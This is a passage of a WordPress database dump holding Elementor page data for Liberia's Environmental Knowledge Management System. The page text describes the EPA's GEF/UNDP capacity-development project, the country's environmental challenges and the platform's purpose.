team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(12514,2045,'_elementor_version','2.7.5'),(12515,2045,'_elementor_template_type','wp-page'),(12516,2045,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(12527,2046,'_elementor_edit_mode','builder'),(12528,2046,'_elementor_template_type','wp-page'),(12529,2046,'_elementor_version','2.7.5'),(12530,2046,'_wp_page_template','default'),(12531,2046,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7102f3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.36)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"e346601\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why was the EKMS created?\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"654b3cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.<\\/p>\\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<h3>Development Challenge<\\/h3>\\n<h4>A1. Global Environmental Challenges<\\/h4>\\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).<\\/p>\\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia\\u2019s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).<\\/p>\\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia\\u2019s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).<\\/p>\\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia\\u2019s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.<\\/p>\\n<h4>Root Causes<\\/h4>\\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia\\u2019s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.<\\/p>\\n<h4>A2. Capacity Barriers<\\/h4>\\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia\\u2019s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:<\\/p>\\n<ul>\\n<li style=\\\"list-style-type: none\\\">\\n<ul>\\n<li style=\\\"list-style-type: none;\\\">\\n<ul>\\n<li>Inadequate public awareness and education\\/training<\\/li>\\n<li>Inadequate institutions and institutional frameworks<\\/li>\\n<li>Inadequate political commitment<\\/li>\\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation<\\/li>\\n<li>Inadequate financial resources and economic framework<\\/li>\\n<li>Inadequate strategic plans and implementation<\\/li>\\n<li>Inadequate access to information<\\/li>\\n<li>Inadequate policies and legal frameworks<\\/li>\\n<li>Low level of involvement of civil society<\\/li>\\n<li>Inadequate natural resources management systems<\\/li>\\n<li>Lack of institutional capacities<\\/li>\\n<li>Lack of effective mechanism for information processing and sharing<\\/li>\\n<li>\\n<p>Poor governance<\\/p>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"265f48f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia\\u2019s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:<\\/p>\\n<ul>\\n<li>Weak technical, administrative and managerial capacities;<\\/li>\\n<li>Weak institutional coordination;<\\/li>\\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;<\\/li>\\n<li>Limited stakeholder participation in planning and decision-making processes;<\\/li>\\n<li>Limited dissemination of key information (Republic of Liberia, 2013).<\\/li>\\n<\\/ul>\\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).<\\/p>\\n<h4>A.3 Consistency with National Priorities<\\/h4>\\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).<\\/p>\\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size\\/number of protected areas. In Liberia\\u2019s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.<\\/p>\\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.<\\/p>\\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.<\\/p>\\n<p>The project is also in line with Liberia\\u2019s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia\\u2019s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).<\\/p>\\n<p>Liberia\\u2019s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia\\u2019s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.<\\/p>\\n<p>This project is also in line with Liberia\\u2019s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:<\\/p>\\n<ul>\\n<li>Peace, Security, Rule of Law<\\/li>\\n<li>Sustainable Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Inclusive Governance and Public Institutions<\\/li>\\n<\\/ul>\\n<p>The UNDAF (One Programme) also aligns with Liberia\\u2019s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:<\\/p>\\n<ul>\\n<li>Peace, Security and Rule of Law<\\/li>\\n<li>Economic Transformation<\\/li>\\n<li>Human Development<\\/li>\\n<li>Governance and Public Institutions<\\/li>\\n<li>Cross-cutting issues<\\/li>\\n<\\/ul>\\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system to collect and disseminate environmental information\\/data.<\\/p>\\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.<\\/p>\\n<h4>A.4 Baseline Scenario and Associated Baseline Projects<\\/h4>\\n<p>Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions. Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country\\u2019s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia\\u2019s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it. The civil war only exacerbated the situation, leading to displacement of individuals and unprecedented amounts of resource exploitation. Although Liberia is recovering from the war, 85% of the population still lives below the international poverty line. Liberia\\u2019s HDI (2014) is 0.430, ranking the country 177 out of 188 (UNDP, 2015).\\u00a0<\\/p>\\n<p>Multilateral donor agencies specifically in the field of natural resource management currently working in Liberia now include the African Development Bank, GEF, IFAD, UNDP, and the World Bank. Bilateral donor agencies are also very important development partners from, Norway, and the United States (USAID), as well as other inter-governmental organizations such as the CARE International, Conservation International, and the Society for the Conservation of Nature in Liberia.\\u00a0<\\/p>\\n<p>National environmental NGOs, with assistance from Conservation International, organized themselves into the Alliance for Conservation in Liberia. The goal of this body is to ensure that all local NGOs who are or would like to be involved in conservation of biodiversity can do so without overlapping efforts or functions.\\u00a0<\\/p>\\n<p>Liberia has made significant progress since the end of the civil war by investing in infrastructure, revising existing policies and laws, and reviewing the mandates of political institutions to reduce duplication. One area of progress is updating the mandates and restructuring Government ministries and agencies to improve effectiveness and efficiency. Liberia has also established new agencies like the Rural and Renewable Energy Agency to promote the sustainable development strategy. Reforms in Liberia have been undertaken on an institution-by-institution basis and have not been considered on a holistic basis, nor have they increased coordination and harmonization.\\u00a0<\\/p>\\n<p>Between 2010 and 2012, UNEP implemented a global project, entitled Piloting Integrated Processes and Approaches to Facilitate National Reporting to Rio Conventions that included Liberia as a beneficiary country. This project focused on helping Liberia (among other countries) to better organize modalities for accessing and preparing their national reports. Notwithstanding the capacities developed, a number of important capacities remained to be developed, such as the standardization of data collection and information analysis, improved coordination and collaboration to facilitate streamlined national reporting, and increased awareness and stakeholder engagement in the national reporting process. During the project implementation, activities under component 4 will undertake an updated assessment of the systemic, institutional, and individual capacities that remain a priority to be developed in order to meet and sustain Rio Convention obligations.<\\/p>\\n<p>A description of on-going projects that this project will coordinate with appears in section C.4 Partnerships. Relevant completed UNDP GEF projects that form the baseline of this project include:<\\/p>\\n<h4>Associated Baseline Projects<\\/h4>\\n<table style=\\\"width: 100%;\\\">\\n<tbody>\\n<tr>\\n<th><strong>Project Name<\\/strong><\\/th>\\n<th><strong>Description of project\\u2019s alignment with CCCD project<\\/strong><\\/th>\\n<\\/tr>\\n<tr>\\n<td>GEF Enhancing Resilience to Climate Change by Mainstreaming Adaption Concerns into Agricultural Sector Development in Liberia (Ending September 2015)<\\/td>\\n<td>The expected results of this project included improving the rural communities\\u2019 capacities, increasing sustainable livestock and crop production, and reducing poverty.<\\/td>\\n<\\/tr>\\n<tr>\\n<td>FAO to Support MOA Statistics and Information Management System<\\/td>\\n<td>The objective of this project was to support the implementation of a linked information and knowledge system.<\\/td>\\n<\\/tr>\\n<tr>\\n<td>Smallholder Agricultural Productivity Enhancement and Commercialization Project (SAPEC)<\\/td>\\n<td>The goal this project was to reduce rural poverty and household food insecurity. One component is capacity building and institutional strengthening, which includes trainings.<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\\n<h3>B. Strategy<\\/h3>\\n<h4>B.1 Alternative Strategies<\\/h4>\\n<p>During the conceptualization of the present cross-cutting capacity development project, a number of alternative approaches were considered, taking into account the current set of interventions currently underway and planned for Liberia. An important starting point was the findings and recommendations of the National Capacity Self-Assessment, followed by a consideration of the lessons learned from other projects, such as a review of the Final Evaluation of the Mainstreaming and Capacity Building for Sustainable Land Management project . A review of the recommendations contained in the more recent Rio Convention reports was also considered, such as the 2016 National Biodiversity Strategy and Action Plan.<\\/p>\\n<p>The single most common cross-cutting capacity development constraint that was recurring in the various assessments and action plans was the significantly low institutional capacity for managing data and information for improved planning and decision-making to meet and sustain Rio Convention obligations. Taking into account the GEF-6 Cross-Cutting Capacity Development priority of strengthening mainstreaming capacities as a strategy to meet the duality of national development and global environmental priorities, this project\\u2019s objective was formulated.<\\/p>\\n<p>From an implementation perspective, a number of alternative approaches were considered to meet the stated objective. One was for Liberia to continue the same approach of implementing focal area projects, and to strengthen the key set of systemic, institutional, and individual capacities through focal area projects. However, this approach will not address the capacity development gaps nor result in creating synergies. Another aspect considered was to have different components executed by different agencies. The challenge with this approach is the relative weak coordination among government ministries and agencies \\u2013 indeed an important capacity development need that the project would help address. A related issue was the government\\u2019s keen desire to use the project to strengthen national capacity of the Environmental Protection Agency.<\\/p>\\n<p>The selected strategy was based on the real need to strengthen meaningful capacities that can be successfully institutionalized. The key here is not for the project to take on more than the Environmental Protection Agency can absorb, but rather, through the process of project execution, learn how to formulate better plans and make better decisions regarding the global environment within the framework of their institutional mandates. That is, this project places a premium on address institutional sustainability by emphasizing the execution of the project through a wide range of learning-by-doing exercises by the EPA. This will require that they reach out of other government ministries and agencies to meet complementary and shared mandates as well as to effectively negotiate resolution of real or perceived conflicts of interests that come about through Rio Convention mainstreaming.<\\/p>\\n<h4>B.2 Selected Scenario<\\/h4>\\n<p>This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<p style=\\\"background-color: lightgray;\\\">The uniqueness of this project is centered on its cross-cutting nature. Other projects currently under implementation focus on strengthening targeted capacities under one of the three Rio Conventions, and thus have a relatively narrower system boundary than the CCCD programme approach. In the absence of the CCCD project, there remains likelihood that Liberia would not realize its full potential for sustainable development due to limited coordination and decentralization. Additionally, it is likely that environmental management in Liberia would continue to focus on traditionally narrow constructs.<\\/p>\\n<h4>B.3 Knowledge Management<\\/h4>\\n<p>This project is part of a portfolio of capacity building interventions in Liberia that encourages regional cooperation and knowledge and information exchanges. Partnerships and collaboration will also catalyze the transfer of knowledge and competencies among actors and stakeholders. Lessons learned from other projects will be included, as appropriate (for example, in the training programmes and the knowledge management system). This project also contains specific activities to increase the use and sharing of knowledge, and to strengthen critical thinking in understanding the implications of the global environment towards the pursuit of sustainable development. These include a series of learning-by-doing workshops and public dialogues among a diverse set of stakeholders. Component one focuses on establishing a system for collecting and sharing information and data between the institutions for better environmental management and the fulfillment of the obligations of the Rio Conventions (an EKMS).<\\/p>\\n<p>The system that the project will strengthen is the ideal platform to share lessons learned and experiences with the main stakeholders of environmental information and knowledge. Universities and research centers will be at the center of the information and knowledge management and will ensure the integration of innovative scientific and technical information into the project setup and into other baseline initiatives.<\\/p>\\n<p>The project\\u2019s approach to knowledge management is consistent with the International Resource Panel Report on Policy Coherence of the Sustainable Development Goals which emphasizes the need for developing widespread awareness and creating and disseminating decision support tools.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcde0a7\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ee75b34\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"71ce863\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f710f0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5403a84\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"5a46832\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9ac7a19\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"25aa8f3\",\"elType\":\"widget\",\"settings\":{\"title\":\"What does the EKMS include?\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9c544f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"51302d0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Acknowledgement\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5d55e03\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8a1ae94\",\"elType\":\"widget\",\"settings\":{\"title\":\"Disclaimer\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3162138\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12532,2046,'_elementor_controls_usage','a:5:{s:7:\"heading\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:5;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:2:{s:11:\"title_color\";i:4;s:21:\"typography_typography\";i:2;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:21:\"section_divider_style\";a:2:{s:5:\"color\";i:1;s:3:\"gap\";i:1;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:5;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:1:{s:10:\"text_color\";i:5;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:2;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:2:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:1;}}}}}'),(12535,2047,'_elementor_edit_mode','builder'),(12536,2047,'_elementor_template_type','wp-post'),(12537,2047,'_elementor_version','2.7.5'),(12538,2047,'_wp_page_template','default'),(12539,2047,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7516eed\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4021bb6\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured 